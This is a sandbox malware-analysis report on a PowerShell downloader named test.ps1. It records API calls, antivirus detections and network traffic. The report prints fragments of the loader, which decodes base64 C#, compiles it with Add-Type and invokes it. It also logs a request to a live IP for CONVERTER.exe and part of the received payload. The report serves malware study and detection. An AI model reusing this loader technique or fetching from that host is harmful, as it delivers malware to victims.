Summary | ZeroBOX

test.ps1

Generic Malware Antivirus .NET DLL PE File DLL PE32
Category Machine Started Completed
FILE s1_win7_x6403_us April 30, 2025, 1:32 p.m. April 30, 2025, 1:38 p.m.
Size 2.2KB
Type ASCII text, with very long lines, with no line terminators
MD5 56db20e6f6956d96b0ba07b78e04bb32
SHA256 c93a513004c750f9bdbb508acb2395d2f165350e9c0b6c83ea551f5b3d142e84
CRC32 E6792C02
ssdeep 48:tmqv8p785ijQF3gNZE+KbyNHF0NkMKzweub:t6Wim4/lN+NjiWb
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
176.65.144.23 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

WriteConsoleW

buffer: Exception calling "QFjmoLmehmGsnFsBWjxlvkipT" with "0" argument(s): "Could not
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: load file or assembly '11776 bytes loaded from mscorlib, Version=2.0.0.0, Cultu
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: re=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. An att
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: empt was made to load a program with an incorrect format."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\test.ps1:1 char:2259
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + $whatever = "dXNpbmcgU3lzdGVtO3VzaW5nIFN5c3RlbS5JTzt1c2luZyBTeXN0ZW0uTmV0O3Vz
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: SWJ4T1UuV3JpdGUoYnVmZmVyLDAscmVhZCk7fX0KcmVzcG9uc2UuQ2xvc2UoKTt9fX0=";$dec = [T
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: ext.Encoding]::Utf8.GetString([Convert]::FromBase64String($whatever));Add-Type
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: -TypeDefinition $dec;$instance = New-Object EmgIPtRjyO.VCfZKpSqcO.QBicxnCrMeMUg
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: EppkMdRHJJuW;$instance.QFjmoLmehmGsnFsBWjxlvkipT <<<< ();
console_handle: 0x000001af
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x000001c7
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04e81620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059f128
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bccc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bcd00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bcd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
suspicious_features GET method with no useragent header, Connection to IP address
suspicious_request GET http://176.65.144.23/ff/CONVERTER.exe
request GET http://176.65.144.23/ff/CONVERTER.exe

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0258b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02569000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05356000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05357000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05358000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05520000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02576000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02832000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02599000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0257a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02577000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06480000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2188
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00670000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file c:\Users\test22\AppData\Local\Temp\wfkurm67.dll
file C:\Users\test22\AppData\Local\Temp\wfkurm67.dll

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [binary PE bytes omitted] System.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 System.Resources.RuntimeResourceSet RSDS C:\Users\USER\source\repos\CONVERTER\CONVERTER\obj\Debug\CONVERTER.pdb _CorExeMain mscoree.dll VS_VERSION_INFO VarFileInfo Translation StringFileInfo 000004b0 Comments CompanyName FileDescription CONVERTER FileVersion 1.0.0.0 InternalName CONVERTER.exe LegalCopyright Copyright © 2024 LegalTrademarks OriginalFilename CONVERTER.exe ProductName CONVERT
Data received ER ProductVersion 1.0.0.0 Assembly Version 1.0.0.0 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
Data sent GET /ff/CONVERTER.exe HTTP/1.1 Host: 176.65.144.23 Connection: Keep-Alive
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wfkurm67.cmdline"
host 176.65.144.23
file C:\Users\test22\AppData\Local\Temp\wfkurm67.cmdline
Symantec ISB.Heuristic!gen68
ESET-NOD32 a variant of Generik.KSACMRB
Avast PwrSh:Dropper-AG [Drp]
Kaspersky HEUR:Trojan.PowerShell.Agent.gen
DrWeb PowerShell.DownLoader.1598
Google Detected
Antiy-AVL GrayWare[AdWare]/Win32.Puwaders
Microsoft TrojanDownloader:PowerShell/Tnega.PAA!MTB
GData Script.Trojan.Agent.COSQGH
Varist ABApplication.WTW
Ikarus Trojan-Downloader.PowerShell.Agent
huorong TrojanDownloader/PS.NetLoader.eo
AVG PwrSh:Dropper-AG [Drp]
alibabacloud Trojan:Win/Agent.gyf

send

buffer: GET /ff/CONVERTER.exe HTTP/1.1 Host: 176.65.144.23 Connection: Keep-Alive
socket: 1556
sent: 79
1 79 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wfkurm67.cmdline"